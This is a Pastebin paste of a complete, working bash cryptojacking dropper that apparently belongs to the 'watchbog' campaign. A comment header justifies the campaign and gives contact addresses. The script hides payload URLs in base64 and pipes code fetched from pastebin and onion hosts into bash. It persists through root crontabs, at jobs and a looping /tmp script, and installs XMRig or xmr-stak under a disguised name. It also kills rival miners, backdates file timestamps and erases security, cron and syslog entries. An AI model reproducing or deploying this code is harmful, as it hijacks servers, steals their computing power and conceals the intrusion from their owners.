SHARE
TWEET

Untitled

a guest Oct 10th, 2019 85 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. SHELL=/bin/sh
  3. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  4. #This is the Old-ReBuild Lady job copy
  5. #
  6. #Goal:
  7. # The goal of this campaign is as follows;
  8. #       - To keep the internet safe.
  9. #       - To keep them hackers from causing real damage to organisations.
  10. #       - We know you feel We are a potential threat, well We ain't.
  11. #       - We want to show how tiny vulns could lead to total disaters.
  12. #       - We know you feel We are Hypocrite's, because we mine. Well if we don't how the hell we gonna let you know we are in.
  13. #       - Please We plead to evey one out there don't sabotage this campaign (We want to keep the internet safe).
  14. #       - Sometimes you gotta break the rules to make them.
  15. #
  16. #Disclaimer:
  17. #1) We only Wanna Mine.
  18. #2) We don't want your data, or anything or even a ransom.
  19. #3) Please if you find this code, don't post about it.
  20. #4) We make your security better by breaking it.
  21. #
  22. #Contact:
  23. #1) If your server get's infected:
  24. #       - We will provide cleanup script.
  25. #       - We will share source of entry into your servers and patch (surely).
  26. #       - Please if you contacting, please send your affected server's ip and services your run on the server.
  27. #       - lets talk jeff4r-partner@tutanota.com or jeff4r-partner@protonmail.com
  28. #2) If you want to partner with us ?.
  29. #       - Well nothing to say.
  30. #
  31. #Note:
  32. #1) We don't have access to Jeff4r190@tutanota.com anymore.
  33.  
  34. house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzlRVnBkMDJpCg==|base64 -d)
  35. room=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3QzQjRjcEM4Cg==|base64 -d)
  36. park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1R3dVF5YmlRCg==|base64 -d)
  37. beam=$(echo aHR0cHM6Ly9hemlwbGNyNzJxamh6dmluLm9uaW9uLnRvL29sZC50eHQK|base64 -d)
  38. deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3RUZ0xRMzVmCg==|base64 -d)
  39. surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0xVTjgwSGo4Cg==|base64 -d)
  40. me=$( whoami )
  41.  
  42. function getarch() {
  43.         ver="x86_64"
  44.         arch=$(uname -m)
  45.         arch2=$(uname -i)
  46.         arch3=$(getconf LONG_BIT)
  47.         if [ "$arch" == "x86_64" ]; then
  48.                 ver="x86_64"
  49.         elif [ "$arch" == "i686" ]; then
  50.                 ver="i686"
  51.         elif [ "$arch2" == "x86_64" ]; then
  52.                 ver="x86_64"
  53.         elif [ "$arch2" == "i386" ]; then
  54.                 ver="i686"
  55.         elif [ "$arch3" == "64" ]; then
  56.                 ver="x86_64"
  57.         else
  58.                 ver="x86_64"
  59.         fi
  60.         echo $ver
  61. }
  62.  
  63. ARCH=$(getarch)
  64.  
  65. function system() {
  66.         chattr -i /etc/crontab
  67.         rm -rf /bin/httpntp /bin/ftpsdns
  68.         sed -i '/httpntp/d' /etc/crontab
  69.         sed -i '/ftpsdns/d' /etc/crontab
  70.         echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp
  71.         chmod 755 /bin/httpntp
  72.         if [ ! -f "/etc/crontab" ]; then
  73.                 echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab
  74.         else
  75.                 echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
  76.         fi
  77.         (curl -fsSL $room||wget -q -O - $room) > /bin/ftpsdns
  78.         chmod 755 /bin/ftpsdns
  79.         if [ ! -f "/etc/crontab" ]; then
  80.                 echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab
  81.         else
  82.                 echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab
  83.         fi
  84.         touch -acmr /bin/sh /etc/crontab
  85. }
  86.  
  87. function cronhigh() {
  88.         chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
  89.         rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
  90.         mkdir -p /var/spool/cron/crontabs
  91.         mkdir -p /etc/cron.hourly
  92.         mkdir -p /etc/cron.daily
  93.         mkdir -p /etc/cron.monthly
  94.         sed -i '/pastebin.com/d' /etc/cron.d/root && sed -i '/##/d' /etc/cron.d/root
  95.         sed -i '/pastebin.com/d' /etc/cron.d/apache && sed -i '/##/d' /etc/cron.d/apache
  96.         sed -i '/pastebin.com/d' /etc/cron.d/system && sed -i '/##/d' /etc/cron.d/system
  97.         sed -i '/pastebin.com/d' /var/spool/cron/crontabs/root && sed -i '/##/d' /var/spool/cron/crontabs/root
  98.         sed -i '/pastebin.com/d' /var/spool/cron/root && sed -i '/##/d' /var/spool/cron/root
  99.         key=$( (curl -fsSL $house||wget -q -O - $house) )
  100.         echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root
  101.         echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system
  102.         echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache
  103.         echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root
  104.         echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root
  105.         if [ ! -f "/etc/cron.hourly/oanacroane" ]; then
  106.                 echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane
  107.         fi
  108.         if [ ! -f "/etc/cron.daily/oanacroane" ]; then
  109.                 echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane
  110.         fi
  111.         if [ ! -f "/etc/cron.monthly/oanacroane" ]; then
  112.                 echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane
  113.         fi
  114.         touch -acmr /bin/sh /var/spool/cron/root
  115.         touch -acmr /bin/sh /var/spool/cron/crontabs/root
  116.         touch -acmr /bin/sh /etc/cron.d/system
  117.         touch -acmr /bin/sh /etc/cron.d/apache
  118.         touch -acmr /bin/sh /etc/cron.d/root
  119.         touch -acmr /bin/sh /etc/cron.hourly/oanacroane
  120.         touch -acmr /bin/sh /etc/cron.daily/oanacroane
  121.         touch -acmr /bin/sh /etc/cron.monthly/oanacroane
  122. }
  123.  
  124. function cronlow() {
  125.         cr=$(crontab -l | grep "$house" | wc -l)
  126.         if [ ${cr} -eq 0 ];then
  127.                 crontab -r
  128.                 (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1")| crontab -
  129.         else
  130.                 echo " "
  131.         fi
  132. }
  133.  
  134. function cronbackup() {
  135.         pay="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
  136.         status=0
  137.         crona=$(systemctl is-active cron)
  138.         cronb=$(systemctl is-active crond)
  139.         cronatd=$(systemctl is-active atd)
  140.         if [ "$crona" == "active" ] ; then
  141.                 status=0
  142.         elif [ "$cronb" == "active"  ]; then
  143.                 status=0
  144.         elif [ "$cronatd" == "active" ] ; then
  145.                 status=1
  146.         else
  147.                 status=2
  148.         fi
  149.         if [ $status -eq 1 ] ; then
  150.                 for a in $(at -l|awk '{print $1}'); do at -r $a; done
  151.                 echo "$pay" | at -m now + 1 minute
  152.         fi
  153.         if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
  154.                 amiup=$(ps -fe|grep 'crun'|grep -v grep|wc -l)
  155.                 if [ ${amiup} -ne 0 ] ; then
  156.                         ps auxf|grep -v grep|grep "crun" | awk '{print $2}'|xargs kill -9
  157.                 fi
  158.                 key="while true; do sleep 60 && $pay; done"
  159.                 echo -e "$key\n##" > /tmp/crun && chmod 777 /tmp/crun && cd /tmp/
  160.                 nohup ./crun >/dev/null 2>&1 &
  161.                 sleep 15
  162.                 rm /tmp/crun
  163.         fi
  164. }
  165.  
  166. function gettarfile() {
  167.         temp_path="/tmp/.tmpdropoff/"
  168.         if [ "$3" == "-xzf" ];then
  169.                 tar_out="/tmp/.tmpdropoff/rig.tar.gz"
  170.                 rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls"
  171.         else
  172.                 tar_out="/tmp/.tmpdropoff/rig.tar.xz"
  173.                 rig_path="/tmp/.tmpdropoff/dataoutput/xmr-stak-linux-2.10.3-cpu/xmr-stak"
  174.         fi
  175.         mkdir -p $temp_path/dataoutput/
  176.         cd $temp_path
  177.         (curl -fsSL $2 -o $tar_out||wget -q $2 -O $tar_out)
  178.         tar $3 $tar_out -C $temp_path/dataoutput/
  179.         mv $rig_path $4
  180.         cd $1
  181.         rm -rf $temp_path
  182. }
  183.  
  184. function getencodedfile() {
  185.         (curl -fsSL $1|| wget -q -O - $1)| base64 -d > $2
  186. }
  187.  
  188. function download() {
  189.         pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  190.         if [ ${pa} -eq 0 ];then
  191.                 mi_64=$(echo aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3YyLjE0LjEveG1yaWctMi4xNC4xLXhlbmlhbC14NjQudGFyLmd6Cg==|base64 -d)
  192.                 mi_32=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9adVZXY2VXRw==|base64 -d)
  193.                 der_ke=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2RYRDJCczBICg==|base64 -d)
  194.                 if [ "$me" != "root" ]; then
  195.                         path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
  196.                         if [ -d "$path" ]; then
  197.                                 rm -rf $path/*
  198.                         else
  199.                                 mkdir -p $path
  200.                         fi
  201.                 else
  202.                         path="/bin"
  203.                         rm -rf $path/config.json $path/watchbog
  204.                 fi
  205.                 cd $path
  206.                 if [ ! -f "$path/config.json" ]; then
  207.                         getencodedfile "$der_ke" "$path/config.json"
  208.                 fi
  209.                 if [ "$ARCH" == "x86_64" ]; then
  210.                         if [ ! -f "$path/watchbog" ]; then
  211.                                 gettarfile "$path" "$mi_64" "-xzf" "$path/watchbog"
  212.                                 chmod 777 $path/watchbog
  213.                                 nohup ./watchbog >/dev/null 2>&1 &
  214.                         else
  215.                                 nohup ./watchbog >/dev/null 2>&1 &
  216.                         fi
  217.                 elif [ "$ARCH" == "i686" ]; then
  218.                         # if [ ! -f "$path/watchbog" ]; then
  219.                                 # getencodedfile "$mi_32" "$path/watchbog"
  220.                                 # chmod 777 $path/watchbog
  221.                                 # nohup ./watchbog >/dev/null 2>&1 &
  222.                         # else
  223.                                 # nohup ./watchbog >/dev/null 2>&1 &
  224.                         # fi
  225.                         echo ""
  226.                 else
  227.                         if [ ! -f "$path/watchbog" ]; then
  228.                                 gettarfile "$path" "$mi_64" "-xzf" "$path/watchbog"
  229.                                 chmod 777 $path/watchbog
  230.                                 nohup ./watchbog >/dev/null 2>&1 &
  231.                         else
  232.                                 nohup ./watchbog >/dev/null 2>&1 &
  233.                         fi
  234.                 fi
  235.         fi
  236. }
  237.  
  238. function testa() {
  239.         pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  240.         if [ ${pb} -eq 0 ];then
  241.                 st_64=$(echo aHR0cHM6Ly9naXRodWIuY29tL2ZpcmVpY2UtdWsveG1yLXN0YWsvcmVsZWFzZXMvZG93bmxvYWQvMi4xMC4zL3htci1zdGFrLWxpbnV4LTIuMTAuMy1jcHUudGFyLnh6Cg==|base64 -d)
  242.                 con_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1prejBkOUp6Cg==|base64 -d)
  243.                 cpu_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L212U0VHbVI2Cg==|base64 -d)
  244.                 poo_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NCMFRZQnZHCg==|base64 -d)
  245.                 if [ "$me" != "root" ]; then
  246.                         path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
  247.                         if [ -d "$path" ]; then
  248.                                 rm -rf $path/*
  249.                         else
  250.                                 mkdir -p $path
  251.                         fi
  252.                 else
  253.                         path="/bin"
  254.                         rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
  255.                 fi
  256.                 cd $path
  257.                 if [ ! -f "$path/config.txt" ]; then
  258.                         getencodedfile "$con_url" "$path/config.txt"
  259.                         chmod 777 $path/config.txt
  260.                 fi
  261.                 if [ ! -f "$path/cpu.txt" ]; then
  262.                         getencodedfile "$cpu_url" "$path/cpu.txt"
  263.                         chmod 777 $path/cpu.txt
  264.                 fi
  265.                 if [ ! -f "$path/pools.txt" ]; then
  266.                         getencodedfile "$poo_url" "$path/pools.txt"
  267.                         chmod 777 $path/pools.txt
  268.                 fi
  269.                 if [ "$ARCH" == "x86_64" ]; then
  270.                         if [ ! -f "$path/watchbog" ]; then
  271.                                 gettarfile "$path" "$st_64" "-xf" "$path/watchbog"
  272.                                 chmod 777 $path/watchbog
  273.                                 nohup ./watchbog >/dev/null 2>&1 &
  274.                         else
  275.                                 nohup ./watchbog >/dev/null 2>&1 &
  276.                         fi
  277.                 else
  278.                         rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
  279.                 fi
  280.         fi
  281. }
  282.  
  283. function finished() {
  284.         (curl -fsSL $1 || wget -q -O - $1) && touch /tmp/.tmpc
  285. }
  286.  
  287. function cleanoldpack() {
  288.         pkill -f watchbog
  289.         ps aux | grep -v '/boot/vmlinuz' | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid; done
  290.         ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
  291.         netstat -anp | grep "watchbog" |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  292.         netstat -antp | grep '27.155.87.59\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  293.         netstat -antp | grep '27.155.87.59\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  294.         netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  295.         netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  296.         netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  297.         netstat -antp | grep '121.18.238.56\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  298.         netstat -antp | grep '121.18.238.56\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  299.         netstat -antp | grep '103.99.115.220\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  300.         netstat -antp | grep '103.99.115.220\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  301.         pkill -f /usr/bin/.sshd
  302.         netstat -antp | grep '202.144.193.110:3333\|51.38.133.232'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  303.         pkill -f sourplum
  304.         pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
  305.         rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
  306.         rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
  307.         rm -rf /tmp/*index_bak*
  308.         rm -rf /tmp/*httpd.conf*
  309.         rm -rf /tmp/*httpd.conf
  310.         rm -rf /tmp/a7b104c270
  311.         ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  312.         ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
  313.         ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
  314.         ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
  315.         ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
  316.         ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
  317.         ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
  318.         ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
  319.         ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
  320.         ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
  321.         ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
  322.         ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
  323.         ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
  324.         ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
  325.         ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
  326.         ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
  327.         ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
  328.         ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
  329.         pkill -f biosetjenkins
  330.         pkill -f AnXqV.yam
  331.         pkill -f xmrigDaemon
  332.         pkill -f xmrigMiner
  333.         pkill -f xmrig
  334.         pkill -f Loopback
  335.         pkill -f apaceha
  336.         pkill -f cryptonight
  337.         pkill -f stratum
  338.         pkill -f mixnerdx
  339.         pkill -f performedl
  340.         pkill -f JnKihGjn
  341.         pkill -f irqba2anc1
  342.         pkill -f irqba5xnc1
  343.         pkill -f irqbnc1
  344.         pkill -f ir29xc1
  345.         pkill -f conns
  346.         pkill -f irqbalance
  347.         pkill -f crypto-pool
  348.         pkill -f minexmr
  349.         pkill -f XJnRj
  350.         pkill -f NXLAi
  351.         pkill -f BI5zj
  352.         pkill -f askdljlqw
  353.         pkill -f minerd
  354.         pkill -f minergate
  355.         pkill -f Guard.sh
  356.         pkill -f ysaydh
  357.         pkill -f bonns
  358.         pkill -f donns
  359.         pkill -f kxjd
  360.         pkill -f Duck.sh
  361.         pkill -f bonn.sh
  362.         pkill -f conn.sh
  363.         pkill -f kworker34
  364.         pkill -f kw.sh
  365.         pkill -f pro.sh
  366.         pkill -f polkitd
  367.         pkill -f acpid
  368.         pkill -f icb5o
  369.         pkill -f nopxi
  370.         pkill -f irqbalanc1
  371.         pkill -f minerd
  372.         pkill -f i586
  373.         pkill -f gddr
  374.         pkill -f mstxmr
  375.         pkill -f ddg.2011
  376.         pkill -f wnTKYg
  377.         pkill -f deamon
  378.         pkill -f disk_genius
  379.         pkill -f sourplum
  380.         pkill -f bashx
  381.         pkill -f bashg
  382.         pkill -f bashe
  383.         pkill -f bashf
  384.         pkill -f bashh
  385.         pkill -f XbashY
  386.         pkill -f libapache
  387.         pkill -f qW3xT.2
  388.         pkill -f /usr/bin/.sshd
  389.         pkill -f sustes
  390.         rm -rf /var/tmp/j*
  391.         rm -rf /tmp/j*
  392.         rm -rf /var/tmp/java
  393.         rm -rf /tmp/java
  394.         rm -rf /var/tmp/java2
  395.         rm -rf /tmp/java2
  396.         rm -rf /var/tmp/java*
  397.         rm -rf /tmp/java*
  398.         rm -rf /tmp/httpd.conf
  399.         rm -rf /tmp/conn
  400.         rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
  401.         rm -rf /tmp/conns
  402.         rm -f /tmp/irq.sh
  403.         rm -f /tmp/irqbalanc1
  404.         rm -f /tmp/irq
  405.         rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
  406.         rm -rf /tmp/.systemd-private-*
  407.         netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  408.         netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  409.         netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  410.         netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  411.         netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  412.         netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  413.         netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  414.         netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  415.         netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  416.         netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  417.         netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  418.         netstat -anp | grep :1351 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
  419. }
  420.  
  421. if [ ! -f "/tmp/.jqwwwwwww" ]; then
  422.         touch /tmp/.jqwwwwwww
  423.         cleanoldpack
  424. fi
  425. if [ "$me" != "root" ];then
  426.         pz=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  427.         if [ ${pz} -ne 0 ];then
  428.                 crontab -r
  429.                 cronlow
  430.         else
  431.                 download
  432.                 crontab -r
  433.                 cronlow
  434.                 sleep 15
  435.                 pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  436.                 if [ ${pm} -eq 0 ];then
  437.                         testa
  438.                 fi
  439.                 prt=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  440.                 if [ ${prt} -ne 0 ];then
  441.                         if [ ! -f "/tmp/.tmpc" ]; then
  442.                                 finished "$deep"
  443.                         fi
  444.                 fi
  445.         fi
  446. else
  447.         pz=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  448.         if [ ${pz} -ne 0 ];then
  449.                 system
  450.                 cronhigh
  451.         else
  452.                 system
  453.                 cronhigh
  454.                 download
  455.                 sleep 15
  456.                 pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  457.                 if [ ${pm} -ne 0 ];then
  458.                         if [ ! -f "/tmp/.tmpc" ]; then
  459.                                 finished "$surf"
  460.                         fi
  461.                 fi
  462.                 sleep 30
  463.                 if [ ${pm} -eq 0 ];then
  464.                         testa
  465.                         if [ ${pm} -ne 0 ];then
  466.                                 finished "$surf"
  467.                         fi
  468.                 fi
  469.                 if [ ${pm} -eq 0 ];then
  470.                         download
  471.                         if [ ${pm} -ne 0 ];then
  472.                                 finished "$deep"
  473.                         fi
  474.                 fi
  475.                 if [ ${pm} -eq 0 ];then
  476.                         testa
  477.                         if [ ${pm} -ne 0 ];then
  478.                                 finished "$deep"
  479.                         fi
  480.                 fi
  481.         fi
  482.         echo 0>/var/log/secure
  483.         echo 0>/var/log/cron
  484.         sed -i '/pastebin/d' /var/log/syslog
  485.         sed -i '/github/d' /var/log/syslog
  486. fi
  487. #
  488. cronbackup
  489. #
  490. if [ -f "/tmp/.loawwASQ1233" ]; then
  491.         rm /tmp/.loawwASQ1233
  492. fi
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top